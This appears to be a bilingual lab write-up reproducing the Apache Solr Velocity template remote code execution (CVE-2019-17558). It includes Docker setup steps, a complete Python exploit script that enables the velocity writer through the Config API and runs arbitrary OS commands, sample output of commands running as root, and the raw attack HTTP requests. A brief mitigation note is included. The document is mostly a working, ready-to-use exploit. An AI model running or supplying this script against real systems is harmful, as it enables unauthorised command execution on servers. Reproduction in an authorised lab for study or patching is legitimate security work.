Apache Solr 命令执行（通过 Velocity 模板的 RCE，通常记作 CVE-2019-17558；影响 Solr 5.0.0–8.3.1，8.4.0 已修复）
使用Docker
docker pull solr:8.2.0
docker run --name solr2 -d -p 8081:8983 solr:8.2.0 solr-precreate test

注意：`solr:latest` 已经修复该问题（8.4.0 起），复现时需要拉取 8.3.1 及更早的版本，例如 `solr:8.2.0`。下面的脚本要求目标上至少存在一个 core，官方镜像可以用 `solr-precreate test` 在启动时创建（与后文 `/solr/test/...` 的请求示例一致）。容器把 8983 映射到了宿主机 8081，因此脚本的 target 应写成 `http://<host>:8081`。
验证脚本
#!/usr/bin/env python
# coding: utf-8
import requests
import sys
import json
from requests.packages.urllib3.exceptions import InsecureRequestWarning
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
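# Optional interception proxy (e.g. Burp). Not used by default: pass
# ``proxies=proxies`` to the helpers below to route traffic through it.
proxies = {
    "http": "http://127.0.0.1:8080",
    "https": "http://127.0.0.1:8080",
}

# Seconds to wait for each HTTP round trip. The exec step blocks on
# ``$ex.waitFor()`` server-side, so leave room for slow commands.
TIMEOUT = 30

# Core Admin API call that lists cores; the first core name is reused as
# the path segment for the Config API and for the /select handler.
CORES_URL = '/solr/admin/cores?indexInfo=false&wt=json'

# Config API body that (re)defines the ``velocity`` response writer with
# params.resource.loader.enabled=true, which is what lets a request
# parameter (v.template.custom) supply the template that gets rendered.
VELOCITY_WRITER_CONFIG = {
    "update-queryresponsewriter": {
        "startup": "lazy",
        "name": "velocity",
        "class": "solr.VelocityResponseWriter",
        "template.base.dir": "",
        "solr.resource.loader.enabled": "true",
        "params.resource.loader.enabled": "true",
    }
}

# TLS verification is switched off because the warning is already silenced
# at import time (disable_warnings) and the tool is meant for lab /
# self-signed instances. Only point it at hosts you are authorised to test.
VERIFY_TLS = False


def extract_core_name(body):
    """Return the first core name from a Core Admin ``STATUS`` JSON body.

    Args:
        body: raw JSON text as returned by ``CORES_URL``.

    Returns:
        The first key under ``status`` (insertion order of the JSON object).

    Raises:
        ValueError: if the body is not JSON, has no ``status`` object, or
            lists no cores at all.
    """
    try:
        status = json.loads(body)['status']
    except (ValueError, KeyError, TypeError) as exc:
        raise ValueError('unexpected Core Admin response: %s' % exc)
    if not status:
        raise ValueError('no cores found; create one before running this script')
    return next(iter(status))


def build_template(command):
    """Return the Velocity template that runs *command* and echoes its stdout.

    This is the template from the page in un-encoded form; ``requests``
    URL-encodes it when it is sent as the ``v.template.custom`` parameter.
    ``$ex.waitFor()`` is rendered too, so the output starts with the
    process exit status.

    Args:
        command: OS command. ``Runtime.exec(String)`` tokenizes it on
            whitespace and runs it without a shell, so pipes, redirects and
            shell quoting are passed through literally.

    Raises:
        ValueError: if *command* contains a single quote, which would
            terminate the Velocity string literal around it.
    """
    if "'" in command:
        raise ValueError("single quotes in the command are not supported")
    parts = [
        "#set($x='')",
        "#set($rt=$x.class.forName('java.lang.Runtime'))",
        "#set($chr=$x.class.forName('java.lang.Character'))",
        "#set($str=$x.class.forName('java.lang.String'))",
        "#set($ex=$rt.getRuntime().exec('%s'))" % command,
        "$ex.waitFor()",
        "#set($out=$ex.getInputStream())",
        # One element: the loop body must not be separated by spaces.
        "#foreach($i in [1..$out.available()])"
        "$str.valueOf($chr.toChars($out.read()))"
        "#end",
    ]
    return " ".join(parts)


def get_core_name(target, proxies=None):
    """Discover a core name on *target* through the Core Admin API.

    Raises:
        requests.RequestException: on connection errors or non-2xx status.
        ValueError: if the response lists no cores.
    """
    resp = requests.get(target + CORES_URL, proxies=proxies,
                        verify=VERIFY_TLS, timeout=TIMEOUT)
    resp.raise_for_status()
    return extract_core_name(resp.text)


def enable_velocity_writer(target, core, proxies=None):
    """POST VELOCITY_WRITER_CONFIG to the core's Config API; return the response.

    ``json=`` sets Content-Type and Content-Length from the actual body, so
    the length can never drift out of sync with the payload.
    """
    return requests.post(target + '/solr/' + core + '/config',
                         json=VELOCITY_WRITER_CONFIG, proxies=proxies,
                         verify=VERIFY_TLS, timeout=TIMEOUT)


def run_command(target, core, command, proxies=None):
    """Render the command template through ``/select``; return the response."""
    params = {
        'q': '1',
        'wt': 'velocity',
        'v.template': 'custom',
        'v.template.custom': build_template(command),
    }
    return requests.get(target + '/solr/' + core + '/select', params=params,
                        proxies=proxies, verify=VERIFY_TLS, timeout=TIMEOUT)


def main(argv=None):
    """Entry point: ``solr_rce.py target command``.

    Args:
        argv: argument vector; defaults to ``sys.argv``.

    Returns:
        Process exit status: 0 on success, 1 on usage or any failure.
    """
    argv = sys.argv if argv is None else argv
    if len(argv) != 3:
        print("[+] Usage : ./solr_rce.py target command")
        return 1
    # Tolerate a trailing slash so the path joins don't produce '//solr'.
    target = argv[1].rstrip('/')
    command = argv[2]
    try:
        core = get_core_name(target)
        resp = enable_velocity_writer(target, core)
        if resp.status_code == 404:
            print("[-] failed !")
            return 1
        if resp.status_code != 200:
            # e.g. 401/403 when authentication is enabled, or 500 when the
            # Config API rejects the edit: report it instead of going silent.
            print("[-] Config API returned HTTP %d" % resp.status_code)
            return 1
        print("[+] Set Config Success!")
        resp = run_command(target, core, command)
        print(resp.text)
    except (requests.RequestException, ValueError) as exc:
        # Narrow catch: report the actual cause rather than a generic message.
        print("[-] %s" % exc)
        return 1
    return 0


if __name__ == "__main__":
    sys.exit(main())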
使用方法
[root@localhost ~]# python solr_rce2.py http://xx.xxx.xxx.xx whoami
[+] Set Config Success!
0 root
[root@localhost ~]#

说明：target 需要带协议和端口（本文 Docker 环境为 `http://<host>:8081`）；输出开头的 `0` 是模板里 `$ex.waitFor()` 渲染出来的进程退出码，后面才是命令的标准输出。
Apache Solr RCE via Velocity template (commonly tracked as CVE-2019-17558; Solr 5.0.0–8.3.1, fixed in 8.4.0). Mitigations for anyone running an affected version: upgrade, lock the Config API with the `disable.configEdit=true` system property, and put authentication/authorization in front of Solr so `/config` is not reachable anonymously as it is in this lab.
Step 1 – use the Config API to (re)define the `velocity` response writer with `params.resource.loader.enabled` set to true. That flag is what lets the next request supply an arbitrary template in the `v.template.custom` parameter; the edit is accepted here because the target has no authentication plugin configured, so the request carries no credentials at all.
Request:
========================================================================
POST /solr/test/config HTTP/1.1
Host: solr:8983
Content-Type: application/json
Content-Length: 259
{
"update-queryresponsewriter": {
"startup": "lazy",
"name": "velocity",
"class": "solr.VelocityResponseWriter",
"template.base.dir": "",
"solr.resource.loader.enabled": "true",
"params.resource.loader.enabled": "true"
}
}
========================================================================
Step 2 – RCE via the velocity template. The template calls `Runtime.exec(String)`, which splits the command on whitespace and runs it without a shell, so pipes, redirects and shell quoting in the command are passed literally; a single quote in the command would also terminate the Velocity string literal and break the template.
Request:
========================================================================
GET /solr/test/select?q=1&&wt=velocity&v.template=custom&v.template.custom=%23set($x=%27%27)+%23set($rt=$x.class.forName(%27java.lang.Runtime%27))+%23set($chr=$x.class.forName(%27java.lang.Character%27))+%23set($str=$x.class.forName(%27java.lang.String%27))+%23set($ex=$rt.getRuntime().exec(%27id%27))+$ex.waitFor()+%23set($out=$ex.getInputStream())+%23foreach($i+in+[1..$out.available()])$str.valueOf($chr.toChars($out.read()))%23end HTTP/1.1
Host: localhost:8983
========================================================================
Response (the leading `0` is the process exit status rendered by `$ex.waitFor()`, followed by the command's stdout):
========================================================================
HTTP/1.1 200 OK
Content-Type: text/html;charset=utf-8
Content-Length: 56
0 uid=8983(solr) gid=8983(solr) groups=8983(solr)
========================================================================



